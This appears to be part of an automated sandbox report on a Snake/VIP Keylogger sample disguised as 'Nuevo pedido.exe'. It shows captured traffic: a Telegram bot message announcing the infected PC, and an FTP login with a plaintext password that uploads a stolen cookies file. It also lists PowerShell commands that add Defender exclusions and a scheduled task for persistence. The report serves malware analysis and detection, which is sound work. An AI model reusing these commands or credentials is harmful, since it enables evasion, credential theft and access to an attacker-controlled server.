                                                                                                                                          2025-01-09 15:36:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.449769104.21.16.14438116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:15 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:15 UTC861INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:15 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751764
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r7%2FDRSmWYVyM2CGRvnvnwhPkLScpQQ1RKVOVHD7lbo%2BePgSHoP8W8JzJ0CeklKv23tH8Izs%2Fcl%2FaBxpQ4pG%2BcenzUqjnvFbM9APUVZxZV14tfISCx6D2IlDsgIZ7XVn%2FjcFYPT1M"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff580778d211899-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1554&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1803582&cwnd=153&unsent_bytes=0&cid=f1edd046374fbb15&ts=148&x=0"
                                                                                                                                          2025-01-09 15:36:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          18192.168.2.449774104.21.16.14438116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:16 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-09 15:36:16 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:16 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751765
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zDL3aeOscGG7UbU3WFa1tv5hI15jW0R%2F1e1btfwiKh6uYWEJF2US6xdTkUbnKahWLr4OLA%2FgJBEebYnLooWmqoPeiHl801JC8qM%2F4AGndzr6S9NGmbNzCsBbHfNuX8n%2FegLUVCvj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff580800a337293-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2003&rtt_var=768&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1409946&cwnd=158&unsent_bytes=0&cid=1700a769d375292e&ts=146&x=0"
                                                                                                                                          2025-01-09 15:36:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.449775149.154.167.2204438116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:17 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:42:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:17 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:17 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2025-01-09 15:36:17 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                          Jan 9, 2025 16:36:27.697698116 CET214977850.31.176.103192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.
                                                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.
                                                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login
                                                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                                                          Jan 9, 2025 16:36:27.697879076 CET4977821192.168.2.450.31.176.103USER somavip@gdmaduanas.com
                                                                                                                                          Jan 9, 2025 16:36:27.816128969 CET214977850.31.176.103192.168.2.4331 User somavip@gdmaduanas.com OK. Password required
                                                                                                                                          Jan 9, 2025 16:36:27.816339016 CET4977821192.168.2.450.31.176.103PASS 6JLyf]Kt%D5L
                                                                                                                                          Jan 9, 2025 16:36:28.082225084 CET214977850.31.176.103192.168.2.4230 OK. Current restricted directory is /
                                                                                                                                          Jan 9, 2025 16:36:28.200855017 CET214977850.31.176.103192.168.2.4504 Unknown command
                                                                                                                                          Jan 9, 2025 16:36:28.206984043 CET4977821192.168.2.450.31.176.103PWD
                                                                                                                                          Jan 9, 2025 16:36:28.325298071 CET214977850.31.176.103192.168.2.4257 "/" is your current location
                                                                                                                                          Jan 9, 2025 16:36:28.326448917 CET4977821192.168.2.450.31.176.103TYPE I
                                                                                                                                          Jan 9, 2025 16:36:28.444933891 CET214977850.31.176.103192.168.2.4200 TYPE is now 8-bit binary
                                                                                                                                          Jan 9, 2025 16:36:28.445205927 CET4977821192.168.2.450.31.176.103PASV
                                                                                                                                          Jan 9, 2025 16:36:28.563643932 CET214977850.31.176.103192.168.2.4227 Entering Passive Mode (50,31,176,103,125,59)
                                                                                                                                          Jan 9, 2025 16:36:28.577986956 CET4977821192.168.2.450.31.176.103STOR 494126 - Cookies ID - ZyiAEnXWZP669604277.txt
                                                                                                                                          Jan 9, 2025 16:36:28.984383106 CET214977850.31.176.103192.168.2.4150 Accepted data connection
                                                                                                                                          Jan 9, 2025 16:36:29.113235950 CET214977850.31.176.103192.168.2.4226-File successfully transferred
                                                                                                                                          226-File successfully transferred226 0.119 seconds (measured here), 55.85 Kbytes per second

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Click to jump to process

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:10:35:56
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\Nuevo pedido.exe"
                                                                                                                                          Imagebase:0x470000
                                                                                                                                          File size:754'176 bytes
                                                                                                                                          MD5 hash:B19A7098F74CE79004FFD6A109302EF0
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:10:35:59
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"
                                                                                                                                          Imagebase:0x8a0000
                                                                                                                                          File size:433'152 bytes
                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:10:35:59
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:10:35:59
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
                                                                                                                                          Imagebase:0x8a0000
                                                                                                                                          File size:433'152 bytes
                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:10:35:59
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:10:35:59
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp"
                                                                                                                                          Imagebase:0x6a0000
                                                                                                                                          File size:187'904 bytes
                                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:10:35:59
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:10:35:59
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Users\user\Desktop\Nuevo pedido.exe"
                                                                                                                                          Imagebase:0x320000
                                                                                                                                          File size:754'176 bytes
                                                                                                                                          MD5 hash:B19A7098F74CE79004FFD6A109302EF0
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:10:35:59
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\Nuevo pedido.exe"
                                                                                                                                          Imagebase:0xd30000
                                                                                                                                          File size:754'176 bytes
                                                                                                                                          MD5 hash:B19A7098F74CE79004FFD6A109302EF0
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:10:36:01
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          Imagebase:0xcf0000
                                                                                                                                          File size:754'176 bytes
                                                                                                                                          MD5 hash:B19A7098F74CE79004FFD6A109302EF0
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                          • Detection: 45%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:10:36:02
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                          Imagebase:0x7ff693ab0000
                                                                                                                                          File size:496'640 bytes
                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:10:36:04
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp"
                                                                                                                                          Imagebase:0x6a0000
                                                                                                                                          File size:187'904 bytes
                                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:10:36:04
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:14
                                                                                                                                          Start time:10:36:04
                                                                                                                                          Start date:09/01/2025
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
                                                                                                                                          Imagebase:0xec0000
                                                                                                                                          File size:754'176 bytes
                                                                                                                                          MD5 hash:B19A7098F74CE79004FFD6A109302EF0
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4135978280.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Has exited:false

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:11.6%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:230
                                                                                                                                            Total number of Limit Nodes:17
                                                                                                                                            execution_graph 28929 275acb0 28933 275ad97 28929->28933 28938 275ada8 28929->28938 28930 275acbf 28935 275ada8 28933->28935 28934 275addc 28934->28930 28935->28934 28936 275afe0 GetModuleHandleW 28935->28936 28937 275b00d 28936->28937 28937->28930 28939 275addc 28938->28939 28940 275adb9 28938->28940 28939->28930 28940->28939 28941 275afe0 GetModuleHandleW 28940->28941 28942 275b00d 28941->28942 28942->28930 28964 275d690 DuplicateHandle 28965 275d726 28964->28965 28976 275d040 28977 275d086 GetCurrentProcess 28976->28977 28979 275d0d1 28977->28979 28980 275d0d8 GetCurrentThread 28977->28980 28979->28980 28981 275d115 GetCurrentProcess 28980->28981 28982 275d10e 28980->28982 28985 275d14b 28981->28985 28982->28981 28983 275d173 GetCurrentThreadId 28984 275d1a4 28983->28984 28985->28983 28986 26710de 28988 26710e6 28986->28988 28987 26710fb 28988->28987 28993 2673788 28988->28993 29012 2673778 28988->29012 29031 26736f9 28988->29031 29051 26737e6 28988->29051 28994 26737a2 28993->28994 28995 26737c6 28994->28995 29071 2673f25 28994->29071 29078 2674019 28994->29078 29083 2673b7f 28994->29083 29089 267453f 28994->29089 29093 2673c11 28994->29093 29098 2674531 28994->29098 29106 2674172 28994->29106 29115 2674352 28994->29115 29122 26742b3 28994->29122 29129 2673d16 28994->29129 29133 2674276 28994->29133 29140 26744b7 28994->29140 29147 26742f7 28994->29147 29154 26741ca 28994->29154 29158 2673fce 28994->29158 29162 2673baf 28994->29162 28995->28987 29013 267378f 29012->29013 29014 26737c6 29013->29014 29015 2673f25 4 API calls 29013->29015 29016 2673baf 2 API calls 29013->29016 29017 2673fce 2 API calls 29013->29017 29018 26741ca 2 API calls 29013->29018 29019 26742f7 4 API calls 29013->29019 29020 26744b7 4 API calls 29013->29020 29021 2674276 4 API calls 29013->29021 29022 2673d16 2 API calls 29013->29022 29023 26742b3 4 API calls 29013->29023 29024 2674352 4 API calls 29013->29024 29025 2674172 4 API calls 29013->29025 29026 2674531 4 API calls 29013->29026 29027 2673c11 2 API calls 29013->29027 29028 267453f 2 API calls 29013->29028 29029 2673b7f 2 API calls 29013->29029 29030 2674019 2 API calls 29013->29030 29014->28987 29015->29014 29016->29014 29017->29014 29018->29014 29019->29014 29020->29014 29021->29014 29022->29014 29023->29014 29024->29014 29025->29014 29026->29014 29027->29014 29028->29014 29029->29014 29030->29014 29032 267378f 29031->29032 29033 267371f 29031->29033 29034 26737c6 29032->29034 29035 2673f25 4 API calls 29032->29035 29036 2673baf 2 API calls 29032->29036 29037 2673fce 2 API calls 29032->29037 29038 26741ca 2 API calls 29032->29038 29039 26742f7 4 API calls 29032->29039 29040 26744b7 4 API calls 29032->29040 29041 2674276 4 API calls 29032->29041 29042 2673d16 2 API calls 29032->29042 29043 26742b3 4 API calls 29032->29043 29044 2674352 4 API calls 29032->29044 29045 2674172 4 API calls 29032->29045 29046 2674531 4 API calls 29032->29046 29047 2673c11 2 API calls 29032->29047 29048 267453f 2 API calls 29032->29048 29049 2673b7f 2 API calls 29032->29049 29050 2674019 2 API calls 29032->29050 29033->28987 29034->28987 